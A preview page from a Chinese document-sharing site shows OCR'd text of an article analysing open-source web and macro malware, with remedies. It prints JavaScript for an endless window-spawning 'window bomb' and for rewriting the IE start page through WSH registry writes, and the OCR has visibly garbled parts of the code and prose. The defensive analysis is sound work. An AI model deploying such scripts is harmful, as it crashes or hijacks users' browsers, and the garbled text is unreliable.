返回
常见开源恶意代码片段剖析

常见开源恶意代码片段剖析

ID:34449719

大小:437.86 KB

页数:7页

时间:2019-03-06

常见开源恶意代码片段剖析_第1页
常见开源恶意代码片段剖析_第2页
常见开源恶意代码片段剖析_第3页
常见开源恶意代码片段剖析_第4页
常见开源恶意代码片段剖析_第5页
资源描述:

《常见开源恶意代码片段剖析》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、万方数据常见开源恶意代码片段剂析马文刚摘要:基于开源结构的思维,挑选了典型的Office宏和网页恶意代码进行了技术层面的分析并给出部分防范和修复建议,读者可结合所述知识,举一反三来开发各类修复程序。关键词:恶意代码;网页病毒;宏病毒;反病毒1简介“道高一尺,魔高一丈”,随着反恶意代码技术的不断发展,恶意代码使用的技术也日趋“高深莫测”。回顾近年来的恶意代码发展,隐藏在网页、Office文档等常用文件中的恶意代码逐渐成为r发展的主流。’寄生于常用文件中的恶意代码均为开源结构并利用了不同的脚本技术。而这些脚本技术原本是软件为方便有一定编程技术的用户更快捷地完成烦琐的操作或

2、使任务自动化而增加的功能,但在一些恶意代码的设计者手中.这些脚本技术则“摇身一变”,成为了威力强大的破坏工具,如曾经带来极大危害的“爱虫”、“欢乐时光”、“梅丽莎”、“台湾一号”等都是基于开源脚本的结构。这些恶意代码在用户打开带毒文件时即发作,真可谓“防不胜防”,威力不逊于可执行文件的病毒.小到修改浏览器标题、主页,大到格式化硬盘。只有“知己知彼”。才能“百战不殆”。本文将这些恶意代码核心代码按作用范围进行分类并逐一揭示其所使用的技术.同时给出预防和修复的方法,以便读者提高警惕、在此基础上做好自身的防病毒和反病毒工作。2常见网页恶意代码分析2.1浏览器相关2.1.1视

3、窗炸弹很多用户浏览包含此类代码的网页会被无穷尽的新建浏览器窗体“包围”,最后因系统资源耗尽而崩溃。该恶意代码使用了脚本中的“window.open”技术,结合死循环代码。制造了这些“视窗炸弹”,核心代码(JavaScript脚本)如下所示:functionWindowBomb()∥初始化记数变量{variCounter=0∥永“真”逻辑表达式,造成死循环while(true){橱建浏览器窗体window.open《。http://test.test.com。,‘窗体炸弹‘+.卜迫鲂焉:茹与。i嗣渗Counter,"width=200.height=200,resiza

4、ble=no。):∥自增计数变量,用于窗体标识iCounter++;}}修复和预防方法:由于该恶意代码使用了纯脚本技术,因此一些提供消除广告弹出窗口脚本功能的浏览器即可预防.2.1.2恶意篡改主页很多网民在浏览网页后常会被一些网站莫名其妙地修改了主页。其实这些网站的页面中使用Applet技术调用了WSH(Windows脚本组件)的“SheU”对象.从而实现改写注册表中的匝浏览器主贞设置,核心代码(JavaScript脚本)如下所示:,/修改浏览器主页的核心恶意代码functionf0{∥引用网页页面的第1个Applet对象实例appletObjectl=documen

5、t.applets[0];//通过该实例创建一个WSH的“Shell”对象实例appletObjectl.setCLSID(。(F935DC22—1CFO一11DO—AD89—00C04FD58AOB}。):appletObjectl.createlnstance():ShellObjectl=appletObjectl.GetObject0;∥借助WSH对象改写注册表中的IE主贞设置内容ShellObjectl.RegWrite《。HKCU幅oftware\\Microsoftkkln-ternetExplorerk\MainkkStartPage。,。http:/

6、/test.test.com/');ShellObjectl.RegWrite(-HKLM\kSoftwarekVvticrosoft\kln—ternetExplorehklVlain惦tartPage‘,。http:/Aest.test.com/');J,,触发该恶意代码的函数functioninit()∥每1000毫秒(1秒)执行1次修改浏览器主页的恶意代码{setTimeout(。f0。.1000);}initO:修复和预防方法:从上述的代码中其实可以发现,只需借鉴这些代码,将代码中设置的恶意主页(“http://test.test.corn/”)改为用户自己

7、所需的主页,然后浏览含有该代码的网页.主页即可复原,有“以毒攻毒”之妙。2.1.3修改IE浏览器标题栏有些恶意代码使用前例所述的Applet调用WSH的~一~一~一集一密~慧~智.....一.。...兰第~用~实一~一~一~一~万方数据f管汁算机安全与维蜩I竺=,—:—二=‘=__==二二=二=——,。⋯⋯-Ca啊PUTERSECURITYANDMAINTENANCE.⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯⋯“She珏”对象。改写了注册表中的IE浏览器标题栏内容设置,,,借助WSH改写注册表,增加IE浏览器的右键菜单项并核心代码(Jav

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。